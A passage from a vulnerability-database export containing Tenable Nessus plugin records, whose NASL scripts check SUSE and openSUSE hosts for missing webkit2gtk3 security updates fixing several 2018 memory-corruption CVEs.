"p-cpe:/a:novell:suse_linux:webkit2gtk-4_0-injected-bundles-debuginfo", "p-cpe:/a:novell:suse_linux:webkit2gtk3-debugsource", "p-cpe:/a:novell:suse_linux:webkit2gtk3-devel", "cpe:/o:novell:suse_linux:12"], "id": "SUSE_SU-2019-0146-1.NASL", "href": "https://www.tenable.com/plugins/nessus/121343", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2019:0146-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(121343);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/13\");\n\n script_cve_id(\"CVE-2018-4437\", \"CVE-2018-4438\", \"CVE-2018-4441\", \"CVE-2018-4442\", \"CVE-2018-4443\", \"CVE-2018-4464\");\n\n script_name(english:\"SUSE SLED12 / SLES12 Security Update : webkit2gtk3 (SUSE-SU-2019:0146-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"This update for webkit2gtk3 to version 2.22.5 fixes the following\nissues :\n\nSecurity issues fixed :\n\nCVE-2018-4438: Fixed a logic issue which lead to memory corruption\n(bsc#1119554)\n\nCVE-2018-4437, CVE-2018-4441, CVE-2018-4442, CVE-2018-4443,\nCVE-2018-4464: Fixed multiple memory corruption issues with improved\nmemory handling (bsc#1119553, bsc#1119555, bsc#1119556, bsc#1119557,\nbsc#1119558)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1119553\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1119554\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1119555\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1119556\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1119557\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1119558\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4437/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4438/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4441/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4442/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4443/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4464/\"\n );\n # https://www.suse.com/support/update/announcement/2019/suse-su-20190146-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?7e74bdcd\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE OpenStack Cloud 7:zypper in -t patch\nSUSE-OpenStack-Cloud-7-2019-146=1\n\nSUSE Linux Enterprise Workstation Extension 12-SP4:zypper in -t patch\nSUSE-SLE-WE-12-SP4-2019-146=1\n\nSUSE Linux Enterprise Workstation Extension 12-SP3:zypper in -t patch\nSUSE-SLE-WE-12-SP3-2019-146=1\n\nSUSE Linux Enterprise Software Development Kit 12-SP4:zypper in -t\npatch SUSE-SLE-SDK-12-SP4-2019-146=1\n\nSUSE Linux Enterprise Software Development Kit 12-SP3:zypper in -t\npatch SUSE-SLE-SDK-12-SP3-2019-146=1\n\nSUSE Linux Enterprise Server for SAP 12-SP2:zypper in -t patch\nSUSE-SLE-SAP-12-SP2-2019-146=1\n\nSUSE Linux Enterprise Server 12-SP4:zypper in -t patch\nSUSE-SLE-SERVER-12-SP4-2019-146=1\n\nSUSE Linux Enterprise Server 12-SP3:zypper in -t patch\nSUSE-SLE-SERVER-12-SP3-2019-146=1\n\nSUSE Linux Enterprise Server 12-SP2-LTSS:zypper in -t patch\nSUSE-SLE-SERVER-12-SP2-2019-146=1\n\nSUSE Linux Enterprise Server 12-SP2-BCL:zypper in -t patch\nSUSE-SLE-SERVER-12-SP2-BCL-2019-146=1\n\nSUSE Linux Enterprise Desktop 12-SP4:zypper in -t patch\nSUSE-SLE-DESKTOP-12-SP4-2019-146=1\n\nSUSE Linux Enterprise Desktop 12-SP3:zypper in -t patch\nSUSE-SLE-DESKTOP-12-SP3-2019-146=1\n\nSUSE Enterprise Storage 4:zypper in -t patch SUSE-Storage-4-2019-146=1\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libjavascriptcoregtk-4_0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libjavascriptcoregtk-4_0-18-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libwebkit2gtk-4_0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libwebkit2gtk-4_0-37-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:typelib-1_0-JavaScriptCore\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:typelib-1_0-WebKit2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:typelib-1_0-WebKit2WebExtension\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:webkit2gtk-4_0-injected-bundles\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:webkit2gtk-4_0-injected-bundles-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:webkit2gtk3-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:webkit2gtk3-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/04/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/01/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/01/24\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLED12|SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLED12 / SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(2|3|4)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP2/3/4\", os_ver + \" SP\" + sp);\nif (os_ver == \"SLED12\" && (! preg(pattern:\"^(3|4)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLED12 SP3/4\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libjavascriptcoregtk-4_0-18-2.22.5-2.32.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libjavascriptcoregtk-4_0-18-debuginfo-2.22.5-2.32.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libwebkit2gtk-4_0-37-2.22.5-2.32.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libwebkit2gtk-4_0-37-debuginfo-2.22.5-2.32.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"typelib-1_0-JavaScriptCore-4_0-2.22.5-2.32.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"typelib-1_0-WebKit2-4_0-2.22.5-2.32.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"webkit2gtk-4_0-injected-bundles-2.22.5-2.32.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"webkit2gtk-4_0-injected-bundles-debuginfo-2.22.5-2.32.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"webkit2gtk3-debugsource-2.22.5-2.32.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libjavascriptcoregtk-4_0-18-2.22.5-2.32.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libjavascriptcoregtk-4_0-18-debuginfo-2.22.5-2.32.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libwebkit2gtk-4_0-37-2.22.5-2.32.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libwebkit2gtk-4_0-37-debuginfo-2.22.5-2.32.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"typelib-1_0-JavaScriptCore-4_0-2.22.5-2.32.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"typelib-1_0-WebKit2-4_0-2.22.5-2.32.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"webkit2gtk-4_0-injected-bundles-2.22.5-2.32.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"webkit2gtk-4_0-injected-bundles-debuginfo-2.22.5-2.32.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"webkit2gtk3-debugsource-2.22.5-2.32.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libjavascriptcoregtk-4_0-18-2.22.5-2.32.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libjavascriptcoregtk-4_0-18-debuginfo-2.22.5-2.32.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libwebkit2gtk-4_0-37-2.22.5-2.32.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libwebkit2gtk-4_0-37-debuginfo-2.22.5-2.32.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"typelib-1_0-JavaScriptCore-4_0-2.22.5-2.32.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"typelib-1_0-WebKit2-4_0-2.22.5-2.32.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"typelib-1_0-WebKit2WebExtension-4_0-2.22.5-2.32.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"webkit2gtk-4_0-injected-bundles-2.22.5-2.32.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"webkit2gtk-4_0-injected-bundles-debuginfo-2.22.5-2.32.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"webkit2gtk3-debugsource-2.22.5-2.32.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"webkit2gtk3-devel-2.22.5-2.32.2\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"4\", cpu:\"x86_64\", reference:\"libjavascriptcoregtk-4_0-18-2.22.5-2.32.2\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"4\", cpu:\"x86_64\", reference:\"libjavascriptcoregtk-4_0-18-debuginfo-2.22.5-2.32.2\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"4\", cpu:\"x86_64\", reference:\"libwebkit2gtk-4_0-37-2.22.5-2.32.2\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"4\", cpu:\"x86_64\", reference:\"libwebkit2gtk-4_0-37-debuginfo-2.22.5-2.32.2\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"4\", cpu:\"x86_64\", reference:\"typelib-1_0-JavaScriptCore-4_0-2.22.5-2.32.2\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"4\", cpu:\"x86_64\", reference:\"typelib-1_0-WebKit2-4_0-2.22.5-2.32.2\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"4\", cpu:\"x86_64\", reference:\"webkit2gtk-4_0-injected-bundles-2.22.5-2.32.2\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"4\", cpu:\"x86_64\", reference:\"webkit2gtk-4_0-injected-bundles-debuginfo-2.22.5-2.32.2\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"4\", cpu:\"x86_64\", reference:\"webkit2gtk3-debugsource-2.22.5-2.32.2\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"libjavascriptcoregtk-4_0-18-2.22.5-2.32.2\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"libjavascriptcoregtk-4_0-18-debuginfo-2.22.5-2.32.2\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"libwebkit2gtk-4_0-37-2.22.5-2.32.2\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"libwebkit2gtk-4_0-37-debuginfo-2.22.5-2.32.2\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"typelib-1_0-JavaScriptCore-4_0-2.22.5-2.32.2\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"typelib-1_0-WebKit2-4_0-2.22.5-2.32.2\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"webkit2gtk-4_0-injected-bundles-2.22.5-2.32.2\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"webkit2gtk-4_0-injected-bundles-debuginfo-2.22.5-2.32.2\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"webkit2gtk3-debugsource-2.22.5-2.32.2\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"webkit2gtk3\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:29:24", "description": "This update for webkit2gtk3 to version 2.22.5 fixes the following issues :\n\nSecurity issues fixed :\n\n - CVE-2018-4438: Fixed a logic issue which lead to memory corruption (bsc#1119554)\n\n - CVE-2018-4437, CVE-2018-4441, CVE-2018-4442, CVE-2018-4443, CVE-2018-4464: Fixed multiple memory corruption issues with improved memory handling (bsc#1119553, bsc#1119555, bsc#1119556, bsc#1119557, bsc#1119558)\n\nThis update was imported from the SUSE:SLE-12-SP2:Update update project.", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2019-02-01T00:00:00", "type": "nessus", "title": "openSUSE Security Update : webkit2gtk3 (openSUSE-2019-108)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-4437", "CVE-2018-4438", "CVE-2018-4441", "CVE-2018-4442", "CVE-2018-4443", "CVE-2018-4464"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:libjavascriptcoregtk-4_0-18", "p-cpe:/a:novell:opensuse:libjavascriptcoregtk-4_0-18-32bit", "p-cpe:/a:novell:opensuse:libjavascriptcoregtk-4_0-18-debuginfo", "p-cpe:/a:novell:opensuse:libjavascriptcoregtk-4_0-18-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libwebkit2gtk-4_0-37", "p-cpe:/a:novell:opensuse:libwebkit2gtk-4_0-37-32bit", "p-cpe:/a:novell:opensuse:libwebkit2gtk-4_0-37-debuginfo", "p-cpe:/a:novell:opensuse:libwebkit2gtk-4_0-37-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libwebkit2gtk3-lang", "p-cpe:/a:novell:opensuse:typelib-1_0-JavaScriptCore-4_0", "p-cpe:/a:novell:opensuse:typelib-1_0-WebKit2-4_0", "p-cpe:/a:novell:opensuse:typelib-1_0-WebKit2WebExtension-4_0", "p-cpe:/a:novell:opensuse:webkit-jsc-4", "p-cpe:/a:novell:opensuse:webkit-jsc-4-debuginfo", "p-cpe:/a:novell:opensuse:webkit2gtk-4_0-injected-bundles", "p-cpe:/a:novell:opensuse:webkit2gtk-4_0-injected-bundles-debuginfo", "p-cpe:/a:novell:opensuse:webkit2gtk3-debugsource", "p-cpe:/a:novell:opensuse:webkit2gtk3-devel", "p-cpe:/a:novell:opensuse:webkit2gtk3-minibrowser", "p-cpe:/a:novell:opensuse:webkit2gtk3-minibrowser-debuginfo", "p-cpe:/a:novell:opensuse:webkit2gtk3-plugin-process-gtk2", "p-cpe:/a:novell:opensuse:webkit2gtk3-plugin-process-gtk2-debuginfo", "cpe:/o:novell:opensuse:42.3"], "id": "OPENSUSE-2019-108.NASL", "href": "https://www.tenable.com/plugins/nessus/121538", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2019-108.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(121538);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2018-4437\", \"CVE-2018-4438\", \"CVE-2018-4441\", \"CVE-2018-4442\", \"CVE-2018-4443\", \"CVE-2018-4464\");\n\n script_name(english:\"openSUSE Security Update : webkit2gtk3 (openSUSE-2019-108)\");\n script_summary(english:\"Check for the openSUSE-2019-108 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for webkit2gtk3 to version 2.22.5 fixes the following\nissues :\n\nSecurity issues fixed :\n\n - CVE-2018-4438: Fixed a logic issue which lead to memory\n corruption (bsc#1119554)\n\n - CVE-2018-4437, CVE-2018-4441, CVE-2018-4442,\n CVE-2018-4443, CVE-2018-4464: Fixed multiple memory\n corruption issues with improved memory handling\n (bsc#1119553, bsc#1119555, bsc#1119556, bsc#1119557,\n bsc#1119558)\n\nThis update was imported from the SUSE:SLE-12-SP2:Update update\nproject.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1119553\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1119554\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1119555\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1119556\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1119557\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1119558\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected webkit2gtk3 packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libjavascriptcoregtk-4_0-18\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libjavascriptcoregtk-4_0-18-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libjavascriptcoregtk-4_0-18-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libjavascriptcoregtk-4_0-18-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwebkit2gtk-4_0-37\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwebkit2gtk-4_0-37-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwebkit2gtk-4_0-37-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwebkit2gtk-4_0-37-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwebkit2gtk3-lang\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:typelib-1_0-JavaScriptCore-4_0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:typelib-1_0-WebKit2-4_0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:typelib-1_0-WebKit2WebExtension-4_0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit-jsc-4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit-jsc-4-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit2gtk-4_0-injected-bundles\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit2gtk-4_0-injected-bundles-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit2gtk3-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit2gtk3-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit2gtk3-minibrowser\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit2gtk3-minibrowser-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit2gtk3-plugin-process-gtk2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit2gtk3-plugin-process-gtk2-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.3\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/04/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/01/31\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/02/01\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE42\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"42.3\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE42.3\", reference:\"libjavascriptcoregtk-4_0-18-2.22.5-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"libjavascriptcoregtk-4_0-18-debuginfo-2.22.5-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"libwebkit2gtk-4_0-37-2.22.5-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"libwebkit2gtk-4_0-37-debuginfo-2.22.5-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"libwebkit2gtk3-lang-2.22.5-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"typelib-1_0-JavaScriptCore-4_0-2.22.5-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"typelib-1_0-WebKit2-4_0-2.22.5-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"typelib-1_0-WebKit2WebExtension-4_0-2.22.5-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"webkit-jsc-4-2.22.5-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"webkit-jsc-4-debuginfo-2.22.5-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"webkit2gtk-4_0-injected-bundles-2.22.5-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"webkit2gtk-4_0-injected-bundles-debuginfo-2.22.5-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"webkit2gtk3-debugsource-2.22.5-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"webkit2gtk3-devel-2.22.5-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"webkit2gtk3-minibrowser-2.22.5-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"webkit2gtk3-minibrowser-debuginfo-2.22.5-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"webkit2gtk3-plugin-process-gtk2-2.22.5-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"webkit2gtk3-plugin-process-gtk2-debuginfo-2.22.5-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", cpu:\"x86_64\", reference:\"libjavascriptcoregtk-4_0-18-32bit-2.22.5-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", cpu:\"x86_64\", 